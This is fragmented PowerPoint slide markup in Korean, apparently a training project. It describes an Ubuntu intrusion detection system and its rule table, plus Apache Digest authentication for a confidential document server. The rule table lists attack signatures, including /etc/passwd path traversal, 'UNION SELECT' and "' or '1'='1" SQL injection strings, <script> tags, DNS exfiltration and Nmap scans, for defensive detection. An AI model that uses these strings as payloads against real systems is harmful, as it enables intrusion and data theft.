        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3466078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571500" y="838505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네트워크 위협 탐지</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1257300"/>
            <a:ext cx="571500" cy="3840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571500" y="1447494"/>
            <a:ext cx="11315700" cy="5285325"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 181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	</a:t>
            </a:r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3544" y="1666799"/>
            <a:ext cx="152705" cy="15270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 rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="-300" b="-300"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="886054" y="2143201"/>
            <a:ext cx="75895" cy="152705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076249" y="2314194"/>
            <a:ext cx="2653589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sz="100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 rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="-300" b="-300"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="886054" y="2676296"/>
            <a:ext cx="75895" cy="152705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1119683" y="2639721"/>
            <a:ext cx="4144061" cy="2286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sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076249" y="2848204"/>
            <a:ext cx="4129430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sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="323698"/>
            <a:ext cx="3648456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</a:rPr>
              <a:t>Ubuntu IDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Text 54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304849" y="1600048"/>
            <a:ext cx="1972361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탐지 룰셋 (Rule Sets)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="150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0013" y="2047232"/>
            <a:ext cx="10969956" cy="2496193"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="770013" y="4710393"/>
            <a:ext cx="5429707" cy="1662350"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2051"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E293B">
              <a:alpha val="6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1" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="770013" y="4737900"/>
            <a:ext cx="38405" cy="1634843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBBF24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2" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="998613" y="5223904"/>
            <a:ext cx="5009998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13" name="Image 1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98613" y="5405869"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1227213" y="5398783"/>
            <a:ext cx="4972507" cy="300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인바운드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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/</a:t>
            </a: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아웃바운드 트래픽을 실시간으로 검사하여 사전에 정의된 공격 시그니처와 매칭되는 비정상 행위를 식별</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="115" name="Image 2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98613" y="5821921"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1236738" y="5804395"/>
            <a:ext cx="4771873" cy="3582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정찰활동</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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,</a:t>
            </a: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웹 취약점 공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b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무차별 대입 공격 등 주요 공격 경로에 대한 가시성을 확보하고 로그를 생성</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1332369" y="4870945"/>
            <a:ext cx="4676242" cy="23865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네트워크 경계 기반 실시간 위협 탐지</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="120" name="Image 3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07452" y="4914825"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6667424" y="5004827"/>
            <a:ext cx="4785180" cy="54609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외부에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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172.16.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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을 통해 내부망으로 들어오는 패킷 탐지</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="123" name="Image 0" descr="preencoded.png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438519" y="5038649"/>
            <a:ext cx="152705" cy="1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1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571500" y="838505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네트워크 위협 탐지</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1257300"/>
            <a:ext cx="571500" cy="3840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457200" y="1447495"/>
            <a:ext cx="11430000" cy="5099060"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 181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9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076249" y="2752344"/>
            <a:ext cx="2653589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sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1119683" y="3077871"/>
            <a:ext cx="4144061" cy="2286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sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076249" y="3286354"/>
            <a:ext cx="4129430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sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="323698"/>
            <a:ext cx="3648456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</a:rPr>
              <a:t>Ubuntu IDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Text 54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219352" y="1557174"/>
            <a:ext cx="1972361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탐지 룰셋 (Rule Sets)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="150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143000" y="1944015"/>
          <a:ext cx="9541560" cy="4456782"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="673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0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6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162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순번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탐지 위협 명칭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탐지 대상 </a:t>
                      </a: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프로토콜</a:t>
                      </a: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포트</a:t>
                      </a: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탐지 논리 및 주요 특징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62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1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ICMP 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정찰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ICMP / Any</a:t>
                      </a:r>
                      <a:endParaRPr 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외부에서 내부 자산을 탐색하기 위한 핑 스캔 탐지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162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SSH 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무차별 대입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TCP / 22</a:t>
                      </a:r>
                      <a:endParaRPr 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1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분 내 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회 이상 접속 시도 시 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Brute-force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로 간주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162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3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경로 조작 공격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TCP / 80, 443</a:t>
                      </a:r>
                      <a:endParaRPr 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/etc/passwd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등 시스템 민감 파일 접근 시도 식별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162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4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SQL Injection (A)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TCP / 80, 443</a:t>
                      </a:r>
                      <a:endParaRPr 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데이터 탈취를 위한 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UNION SELECT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구문 삽입 탐지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162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5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SQL Injection (B)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TCP / 80, 443</a:t>
                      </a:r>
                      <a:endParaRPr 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인증 우회 시도 시 자주 쓰이는 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' or '1'='1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탐지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162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6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XSS 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공격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TCP / 80, 443</a:t>
                      </a:r>
                      <a:endParaRPr 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악성 스크립트 실행을 위한 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&lt;script&gt;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태그 삽입 탐지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162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7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비인가 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RDP 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접속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TCP / 3389</a:t>
                      </a:r>
                      <a:endParaRPr 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외부 대역에서 윈도우 원격 데스크톱 접속 시도 감시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5162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8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비인가 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FTP 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접속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TCP / 21</a:t>
                      </a:r>
                      <a:endParaRPr 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보안에 취약한 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FTP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포트로의 외부 접근 시도 식별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5162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9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데이터 유출</a:t>
                      </a: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DNS)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UDP / 53</a:t>
                      </a:r>
                      <a:endParaRPr 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지정된 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DNS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가 아닌 외부 서버로의 비정상적 질의 감시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5162"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10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Nmap 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스캔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TCP / Any</a:t>
                      </a:r>
                      <a:endParaRPr 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OS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식별을 위해 비정상 플래그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(SFUP)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를 사용한 스캔 탐지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Google Sans Text"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="48855" marR="48855" marT="32570" marB="3257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97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" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="323926"/>
            <a:ext cx="3381451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web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1333881"/>
            <a:ext cx="5390167" cy="5266944"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 114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809244" y="4648874"/>
            <a:ext cx="4655594" cy="402334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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809244" y="5847777"/>
            <a:ext cx="4655594" cy="338328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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809244" y="5294669"/>
            <a:ext cx="4655594" cy="371191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456761" y="4534205"/>
            <a:ext cx="5360560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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4358945" y="6854114"/>
            <a:ext cx="34765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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6421638" y="6854114"/>
            <a:ext cx="5592112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Text 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952347" y="4796548"/>
            <a:ext cx="3680678" cy="50932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로그인 로그아웃 기능</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="938174" y="5352962"/>
            <a:ext cx="3702532" cy="56692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자유게시판</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="938174" y="5904061"/>
            <a:ext cx="3158481" cy="55229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파일 업로드 기능</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580644" y="1343025"/>
            <a:ext cx="5360560" cy="57607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9" name="Text 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760323" y="1571625"/>
            <a:ext cx="4033630" cy="33375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사내 커뮤니티</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Shape 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6421638" y="3095930"/>
            <a:ext cx="5592112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1" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6301368" y="1352931"/>
            <a:ext cx="5622999" cy="5266944"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 114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94" name="Shape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6319988" y="1343025"/>
            <a:ext cx="5592112" cy="57607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="818CF8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5" name="Text 61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6772987" y="1533525"/>
            <a:ext cx="4856694" cy="33375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기밀 문서 서버</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6772987" y="4648874"/>
            <a:ext cx="4655594" cy="402334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9" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6779815" y="5838252"/>
            <a:ext cx="4655594" cy="338328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0" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6772987" y="5294669"/>
            <a:ext cx="4655594" cy="371191"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15226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1" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428936" y="4543730"/>
            <a:ext cx="5360560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2" name="Text 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6916090" y="4796548"/>
            <a:ext cx="3680678" cy="50932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기밀 문서 업로드</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Text 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6901917" y="5352962"/>
            <a:ext cx="4030616" cy="56692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 dirty="0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메일 페이지 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0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A Team / B-team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0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폴더 접근 시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0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ID/PW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0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 입력</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6901917" y="5904061"/>
            <a:ext cx="3158481" cy="55229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파일 업로드 및 다운로드</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="112" name="그림 11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80644" y="1914969"/>
            <a:ext cx="5381023" cy="251371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3" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="562280" y="867080"/>
            <a:ext cx="4403109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</a:rPr>
              <a:t>웹 서버</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="114376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151" t="17928" r="33514" b="20624"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6312693" y="2160974"/>
            <a:ext cx="2420073" cy="2090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1399"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8744693" y="2162175"/>
            <a:ext cx="3167407" cy="20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26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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381304" y="560984"/>
            <a:ext cx="11065206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기밀 문서 서버 웹 보안 설정</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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HTTP 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보안 설정</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3000" b="1" kern="0" spc="-75">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728130" y="1580662"/>
            <a:ext cx="5027395" cy="2218254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9" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6995094" y="1700671"/>
            <a:ext cx="374777" cy="362165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0" name="Image 5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7075953" y="1811616"/>
            <a:ext cx="214342" cy="177905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728130" y="1580662"/>
            <a:ext cx="53906" cy="2218254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Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7520466" y="1833069"/>
            <a:ext cx="2776169" cy="26483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E2E8F0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주요 설정 내용 및 기대효과</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6995094" y="2262256"/>
            <a:ext cx="4682138" cy="119787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200" b="1">
                <a:solidFill>
                  <a:srgbClr val="94A3B8"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>AuthType Digest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="94A3B8"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>설정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="94A3B8"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>: 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</a:rPr>
              <a:t>기본 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</a:rPr>
              <a:t>Basic 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</a:rPr>
              <a:t>인증보다 보안성이 강화된 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</a:rPr>
              <a:t>Digest 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</a:rPr>
              <a:t>인증 방식을 적용하여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</a:rPr>
              <a:t>, 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</a:rPr>
              <a:t>네트워크상에서 비밀번호가 평문으로 노출되는 것을 방지하고 비인가자의 접근을 차단함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</a:rPr>
              <a:t>.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b="1">
              <a:solidFill>
                <a:srgbClr val="94A3B8"/>
              </a:solidFill>
              <a:latin typeface="Noto Sans KR"/>
              <a:ea typeface="Noto Sans KR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1">
                <a:solidFill>
                  <a:srgbClr val="94A3B8"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>Require valid-user: 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</a:rPr>
              <a:t>승인된 파일에 등록된 유효한 사용자만이 해당 디렉토리에 접근할 수 있도록 제한하여 중요 데이터의 기밀성을 확보함</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:srgbClr val="94A3B8"/>
              </a:solidFill>
              <a:latin typeface="Noto Sans KR"/>
              <a:ea typeface="Noto Sans KR"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728130" y="4057287"/>
            <a:ext cx="5027395" cy="2140948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5" name="Shape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6995094" y="4177297"/>
            <a:ext cx="374777" cy="362165"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 73385"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F472B6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6" name="Image 6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83226" y="4264602"/>
            <a:ext cx="187388" cy="166522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Shape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728130" y="4057287"/>
            <a:ext cx="53906" cy="2140948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F472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" name="Text 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7537578" y="4286113"/>
            <a:ext cx="2628569" cy="37167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E2E8F0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적용 대상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E2E8F0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(Target)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6995094" y="4841864"/>
            <a:ext cx="4682138" cy="82975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300" b="1">
                <a:solidFill>
                  <a:srgbClr val="94A3B8"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>대상 서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="94A3B8"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>: Alpine Linux (IP : 10.10.0.102)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300" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="94A3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설정 파일 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:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="130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 /etc/apache2/httpd.conf</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="13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7573" y="1577570"/>
            <a:ext cx="6187500" cy="4620665"/>
            <a:chOff x="327573" y="1577570"/>
            <a:chExt cx="6187500" cy="46206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7573" y="1577570"/>
              <a:ext cx="6187500" cy="462066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27573" y="2511424"/>
              <a:ext cx="3660227" cy="144462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49" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324155" y="10671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Apache </a:t>
            </a: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디렉터리별 접근 제어 및 다중 인증 정책 적용</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2001339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182624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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="390449"/>
            <a:ext cx="5677510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HTTP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 다이제스트 인증 도입</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3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88746" y="1560056"/>
            <a:ext cx="3867608" cy="3024624"/>
            <a:chOff x="1288746" y="1560056"/>
            <a:chExt cx="3867608" cy="302462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t="55670" r="70170"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1325323" y="1980591"/>
              <a:ext cx="3624629" cy="2604089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288746" y="3834641"/>
              <a:ext cx="560832" cy="697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0"/>
                <a:t>❌</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Text 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
